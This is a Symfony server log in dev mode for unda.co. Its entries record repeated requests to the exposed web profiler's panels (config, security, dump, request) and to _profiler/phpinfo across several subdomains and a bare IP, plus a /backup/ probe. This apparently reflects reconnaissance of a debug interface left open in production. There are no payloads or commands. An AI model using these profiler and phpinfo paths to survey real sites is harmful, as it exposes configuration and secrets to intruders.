  1428. [2025-12-16 21:05:48] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  1429. [2025-12-16 21:08:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2ea4ae","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2ea4ae?panel=config","method":"GET"} []
  1430. [2025-12-16 21:08:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  1431. [2025-12-16 21:14:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2ea4ae","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2ea4ae","method":"GET"} []
  1432. [2025-12-16 21:14:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  1433. [2025-12-16 21:15:52] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://35.175.10.94/_profiler/phpinfo","method":"GET"} []
  1434. [2025-12-16 21:18:02] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"486bc0","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/486bc0?panel=config","method":"GET"} []
  1435. [2025-12-16 21:18:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  1436. [2025-12-16 21:23:08] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  1437. [2025-12-16 21:25:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1438. [2025-12-16 21:29:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1d5ef8","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/1d5ef8","method":"GET"} []
  1439. [2025-12-16 21:29:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  1440. [2025-12-16 21:33:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"83a376","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/83a376?panel=dump","method":"GET"} []
  1441. [2025-12-16 21:33:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  1442. [2025-12-16 21:36:14] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"d669c6","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/d669c6/search/results?ip=66.249.77.38&limit=10&method=GET","method":"GET"} []
  1443. [2025-12-16 21:36:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=66.249.77.38&limit=10&method=GET","method":"GET"} []
  1444. [2025-12-16 21:37:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ec2e58","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/ec2e58?panel=twig","method":"GET"} []
  1445. [2025-12-16 21:37:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  1446. [2025-12-16 21:38:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"48c5ed","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/48c5ed?panel=logger","method":"GET"} []
  1447. [2025-12-16 21:38:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  1448. [2025-12-16 21:39:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"153cba","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/153cba?panel=router","method":"GET"} []
  1449. [2025-12-16 21:39:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  1450. [2025-12-16 21:43:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0b9d80","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/0b9d80?panel=security","method":"GET"} []
  1451. [2025-12-16 21:43:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  1452. [2025-12-16 21:44:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5235dc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5235dc?panel=cache","method":"GET"} []
  1453. [2025-12-16 21:44:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  1454. [2025-12-16 21:49:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0b9d80","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/0b9d80?panel=cache","method":"GET"} []
  1455. [2025-12-16 21:49:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  1456. [2025-12-16 21:51:43] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  1457. [2025-12-16 21:53:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"89d052","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/89d052?panel=validator","method":"GET"} []
  1458. [2025-12-16 21:53:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  1459. [2025-12-16 21:54:56] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"36d0fa","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/36d0fa/search/results?limit=10&method=GET","method":"GET"} []
  1460. [2025-12-16 21:54:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  1461. [2025-12-16 21:56:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"50512a","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/50512a?panel=cache","method":"GET"} []
  1462. [2025-12-16 21:56:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  1463. [2025-12-16 22:02:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"037234","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/037234?panel=time","method":"GET"} []
  1464. [2025-12-16 22:02:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  1465. [2025-12-16 22:04:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3c13a4","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/3c13a4?panel=events","method":"GET"} []
  1466. [2025-12-16 22:04:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  1467. [2025-12-16 22:08:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"037234","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/037234?panel=config","method":"GET"} []
  1468. [2025-12-16 22:08:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  1469. [2025-12-16 22:15:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e96b9f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e96b9f?panel=twig","method":"GET"} []
  1470. [2025-12-16 22:15:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  1471. [2025-12-16 22:15:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1472. [2025-12-16 22:21:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b144c2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b144c2?panel=logger","method":"GET"} []
  1473. [2025-12-16 22:21:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  1474. [2025-12-16 22:22:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e96b9f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e96b9f?panel=time","method":"GET"} []
  1475. [2025-12-16 22:22:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  1476. [2025-12-16 22:28:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e96b9f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e96b9f?panel=security","method":"GET"} []
  1477. [2025-12-16 22:28:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  1478. [2025-12-16 22:35:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e96b9f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e96b9f?panel=request","method":"GET"} []
  1479. [2025-12-16 22:35:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  1480. [2025-12-16 22:36:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a40855","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a40855?panel=form","method":"GET"} []
  1481. [2025-12-16 22:36:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  1482. [2025-12-16 22:42:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e96b9f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e96b9f?panel=config","method":"GET"} []
  1483. [2025-12-16 22:42:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  1484. [2025-12-16 22:43:05] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://35.175.10.94/_profiler/phpinfo","method":"GET"} []
  1485. [2025-12-16 22:48:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e96b9f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e96b9f?panel=cache","method":"GET"} []
  1486. [2025-12-16 22:48:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  1487. [2025-12-16 22:48:46] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  1488. [2025-12-16 22:51:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a2a520","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a2a520?panel=exception","method":"GET"} []
  1489. [2025-12-16 22:51:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  1490. [2025-12-16 22:54:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e96b9f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e96b9f","method":"GET"} []
  1491. [2025-12-16 22:54:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  1492. [2025-12-16 22:55:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1e0bba","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1e0bba?panel=form","method":"GET"} []
  1493. [2025-12-16 22:55:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  1494. [2025-12-16 23:01:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"037234","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/037234?panel=cache","method":"GET"} []
  1495. [2025-12-16 23:01:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  1496. [2025-12-16 23:01:25] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  1497. [2025-12-16 23:07:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"037234","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/037234","method":"GET"} []
  1498. [2025-12-16 23:07:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  1499. [2025-12-16 23:14:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a0f5ec","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a0f5ec?panel=twig","method":"GET"} []
  1500. [2025-12-16 23:14:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  1501. [2025-12-16 23:16:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"130ea7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/130ea7?panel=time","method":"GET"} []
  1502. [2025-12-16 23:16:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  1503. [2025-12-16 23:22:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a0f5ec","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a0f5ec?panel=time","method":"GET"} []
  1504. [2025-12-16 23:22:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  1505. [2025-12-16 23:27:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d65141","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d65141?panel=form","method":"GET"} []
  1506. [2025-12-16 23:27:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  1507. [2025-12-16 23:29:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a0f5ec","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a0f5ec?panel=security","method":"GET"} []
  1508. [2025-12-16 23:29:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  1509. [2025-12-16 23:30:32] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  1510. [2025-12-16 23:37:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a0f5ec","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a0f5ec?panel=request","method":"GET"} []
  1511. [2025-12-16 23:37:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  1512. [2025-12-16 23:43:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a0f5ec","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a0f5ec?panel=config","method":"GET"} []
  1513. [2025-12-16 23:43:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  1514. [2025-12-16 23:46:00] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://auth.unda.co/_profiler/phpinfo","method":"GET"} []
  1515. [2025-12-16 23:47:08] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://web.unda.co/_profiler/phpinfo","method":"GET"} []
  1516. [2025-12-16 23:48:28] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://admin.unda.co/_profiler/phpinfo","method":"GET"} []
  1517. [2025-12-16 23:48:28] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  1518. [2025-12-16 23:48:28] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  1519. [2025-12-16 23:48:28] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  1520. [2025-12-16 23:48:28] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  1521. [2025-12-16 23:48:28] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  1522. [2025-12-16 23:48:28] security.DEBUG: Calling Authentication entry point. [] []
  1523. [2025-12-16 23:48:29] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F_profiler%2Fphpinfo","method":"GET"} []
  1524. [2025-12-16 23:49:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=51.161.81.10&limit=10&method=POST","method":"GET"} []
  1525. [2025-12-16 23:49:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=51.161.81.10&limit=10&method=POST","method":"GET"} []
  1526. [2025-12-16 23:50:29] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a0f5ec","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a0f5ec?panel=cache","method":"GET"} []
  1527. [2025-12-16 23:50:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  1528. [2025-12-16 23:57:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a0f5ec","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a0f5ec","method":"GET"} []
  1529. [2025-12-16 23:57:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  1530. [2025-12-16 23:58:36] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://unda.co/_profiler/phpinfo","method":"GET"} []
  1531. [2025-12-16 23:58:36] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://api.unda.co/_profiler/phpinfo","method":"GET"} []
  1532. [2025-12-16 23:58:36] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  1533. [2025-12-16 23:58:36] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1534. [2025-12-16 23:58:36] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1535. [2025-12-16 23:58:36] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  1536. [2025-12-16 23:58:36] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  1537. [2025-12-16 23:58:36] security.DEBUG: Calling Authentication entry point. [] []
  1538. [2025-12-17 00:04:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"34fb9f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/34fb9f?panel=config","method":"GET"} []
